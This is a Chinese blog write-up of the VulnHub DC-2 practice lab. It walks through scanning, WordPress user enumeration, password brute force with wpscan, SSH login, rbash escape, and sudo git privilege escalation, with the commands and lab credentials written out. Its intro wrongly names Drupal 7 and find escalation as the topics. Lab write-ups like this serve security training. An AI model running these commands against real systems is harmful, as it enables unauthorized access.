vuln靶场——DC-2

于 2024-05-03 19:17:57 发布
阅读量692 收藏 13
点赞数 12
分类专栏: 靶场练习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54480761/article/details/138422309
版权

DC-2靶场搭建及渗透实战详细过程(DC靶场系列)-CSDN博客

环境搭建

下载靶场环境

DC: 2 ~ VulnHub

启动靶场环境

渗透靶场

本环境主要在于以下两个知识点
Drupal 7 漏洞利用   (Drupal 7是一款开源的内容管理系统,它基于 PHP 和 MySQL 构建,被广泛用于创建各种类型的网站和应用程序)
find 提权  (Find提权通常指的是在计算机系统中利用漏洞或漏洞组合来获取更高的权限)

信息收集

主机发现

nmap -sP 192.168.178.1/24

得到主机IP为192.168.178.109

扫描端口及服务

nmap -A -p- -v 192.168.178.109

开放了80和7744端口,Did not follow redirect to http://dc-2/,报错显示未重定向,需要修改本地DNS文件(尽量在kali中修改,因为我们还要使用相应工具),同时7744端口使用的是ssh协议,后续可以尝试ssh爆破登录。

linux:打开/etc/hosts

windows:打开C:\Windows\System32\drivers\etc\hosts

添加192.168.178.109 dc-2

访问web站点

http://dc-2/

利用插件,发现CMS是wordpress。发现第一个flag

目录扫描站点
nikto -host 192.168.178.109
dirsearch -u 192.168.178.109 -e * -x 403 404

登录网站

发现后台管理登录界面,尝试爆破登录,flag1提示我们也许需要使用cewl进行生成字典

cewl http://dc-2/ -w dict1.txt

枚举用户名

由于cms使用的的是开源wordpress,所以可以使用wpscan进行专门的暴力破解

wpscan --url dc-2 -e u

扫描出三个用户名

admin
jerry
tom
密码爆破

用户名使用一个字典user.txt,密码依旧使用dict1.txt。

使用wfuzzbp或者wpscan进行爆破

wpscan --url dc-2 -U user.txt -P dict1.txt

找到两个用户

| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

登陆后在用户的pages下找到了第二个flag

发现到此找不到可用的信息了,此时可以查看ssh协议对应信息

hydra爆破ssh登录

ssh jerry@192.168.178.109 -p 7744			adipiscing
ssh tom@192.168.178.109 -p 7744				parturient

成功登录tom用户,输入命令发现用户处于rbash权限,进行rbash逃逸

rbash逃逸

【渗透测试】--- rbash逃逸方法简述-CSDN博客

查看环境变量,发现可以执行的只有四个命令,less、ls、vi、scp

可以使用vi命令进行提权

vi
进入后输入
:set shell=/bin/bash
回车,再进行输入
:shell

也可以使用BASH_CMDS设置shell

BASH_CMDS[x]=/bin/bash
#设置个x变量shell
 
x
#相当于执行shell

看到如图就提升为bash了

此时查看环境变量发现为空,设置环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

根据提示,可能需要su登录到jerry用户

su jerry

Linux越权

登陆以后回到home路径下,检查目录结构

cd /home
cd jerry/
cat flag4.txt

得到flag4

linux越权常用思路

  1. 找敏感文件ls -afind / "*"
  2. sudo -l查看可以使用root权限执行的程序
  3. history分析历史命令
  4. 内核漏洞uname -a

可以使用git进行提权

git提权方法-CSDN博客

sudo git help config
输入
!/bin/bash  或者  !'sh'

或者

sudo git -p help
输入
!/bin/bash

天赋酬勤
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulhub —— MERCY-v2 实战
战神/calmness的博客
12-24 1354
目录 目标 环境 过程 信息收集 nmap扫描 访问8080端口页面 目录遍历 dirb gobuster manager页面 扫描nikto 枚举 用户enum4linux 版本信息 搜索tomcat 漏洞 访问共享 搜索漏洞rips 0.53 文件包含 配置信息tomcat7/tomcat-users.xml 获得用户名和密码 文件上传 获取shell 信息扫描 LinEnum.sh扫描到的用户: linux-exploit-suggester.sh 收集
vuln靶场——DC-1
qq_54480761的博客
05-03 1400
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6033
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3394
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub靶场DC-3渗透教程(Joomla CMS)
旺仔Sec&blog
06-06 1055
靶机下载链接作者DCAU发布日期2020年4月25日难度中等1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈3、希望有不足之处,欢迎各位师傅点评一下!
Vulnhub靶机渗透学习——DC-1
qq_45612828的博客
10-13 148
Metasploit的EXP使用drupal 7的漏洞通过配置文件获取数据库账号数据库更新密码SUID 提权——find。
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2046
vulnhub靶场渗透练习详解——DC9
Vulnhub靶场-DC-1靶机练习
qq_44877412的博客
01-20 375
Vulnhub-DC-1 daoyuan ## 零、环境配置 ​ 1、虚拟机:vmware 15.5.6 ​ 2、攻击环境:kali linux 2020.3 192.168.143.128 ​ 3、靶机:DC-1 ​ 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、攻击过程 一、主机存活扫描 arp-scan -l 探测到目标ip:192.168.143.134 二、端口扫描 namp -A -p- 192.168.143.134 扫描到以下端口以及服务 22端口——
看完这篇 教你玩转渗透测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5322
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
vuln-dev-env
02-20
开发环境要求: 虚拟箱6.1 流浪汉遵循的步骤: 通过运行以下命令将此仓库克隆到您的主机中: vagrant up 使用以下凭据登录到虚拟机: username: vagrant password: vagrant 运行配置脚本: sudo ./scripts/dev-env....
Struts2-Vuln-Demo:Struts2防御实例
03-08
开始学习struts2代码审计时,发现各位师傅分析分析的文章很多,但是给突破demo源码的却很少。并且很多重复复现是在struts2官方案例上进行的。而官方案例代码太多,对于初学者来说无法快速聚焦突破点。 所以我在学习...
ledger-app-monero-1.42-vuln:CVE-2020-6861的PoC存储库:Ledger Monero App支出密钥提取
02-04
"ledger-app-monero-1.42-vuln-master" 这个文件名表明了是关于Ledger Monero应用1.42版本的漏洞,"master"通常表示这是主分支或主要的代码库,很可能包含了PoC的完整实现。 **详细知识点:** 1. **Ledger硬件钱包...
hcraft - HTTP Vuln Request Crafter-开源
04-24
2. **批量请求与模式匹配**:对于大规模扫描任务,hcraft 提供了批量请求功能,可以快速向多个目标发送相同或类似的请求,同时内置模式匹配引擎,方便用户快速识别响应中的漏洞迹象。 3. **模块化设计**:hcraft ...
struts2_vuln_scan.zip_Struts2Scan_struts-scan闪退_struts2漏洞_vuln漏洞
09-23
本压缩包“struts2_vuln_scan.zip”包含了针对Struts2框架的漏洞扫描工具,帮助管理员检测并修复这些潜在的安全问题。 标题中的“Struts2Scan”和“struts-scan闪退”可能是指一个名为Struts2Scan的漏洞扫描器,这...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8345
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
c++课程设计-产品入库管理操作系统.rar
07-24
基于C语言、C++、C#的课程\毕业设计,可供学习参考。
在iOS中展示汉字的Unicode与UTF-8编码方式
最新发布
07-24
在iOS开发中,显示汉字涉及到了字符编码的重要概念,包括Unicode和UTF-8。这两个术语在计算机科学领域中是至关重要的,特别是在处理多语言文本时。让我们深入了解一下这两个概念及其在iOS中的应用。 Unicode是一个字符集,它定义了世界上几乎所有的文字和符号的数字表示,包括汉字。它的目标是为每个字符提供一个唯一的数字,使得任何语言的文字都可以用统一的方式处理。Unicode的最新版本已经包含了超过140,000个字符,涵盖了从古代象形文字到现代表情符号的各种文字系统。 Unicode本身并不规定如何存储这些数字,这就引出了编码格式的概念。UTF-8就是一种广泛使用的Unicode编码方式。UTF代表“Unicode Transformation Format”,它是一种变长的编码方案,根据字符的不同,可以使用1到4个字节来表示一个Unicode字符。 在iOS中,字符串类`NSString`和`NSMutableString`都是基于Unicode的,这意味着它们内部存储的是Unicode字符。当你在代码中创建或处理汉字字符串时,实际上是在处理Unicode字符序列。例如
c语言课程设计-产品管理系统.rar
07-24
基于C语言、C++、C#的课程\毕业设计,可供学习参考。
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
05-23
这是一个使用 SQLMap 工具进行 SQL 注入渗透测试的命令,具体含义如下: - `-u "http://www.target.com/vuln.php"`:指定目标 URL,即要测试的网站链接。 - `--data="id=1"`:指定 POST 请求的参数。 - `-f`:强制执行。 - `--banner`:显示 SQLMap 的 banner。 - `--dbs`:获取目标数据库的名称。 - `--users`:获取数据库用户列表。 需要注意的是,使用 SQL 注入工具进行渗透测试需要获得合法授权,否则可能会触犯法律。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值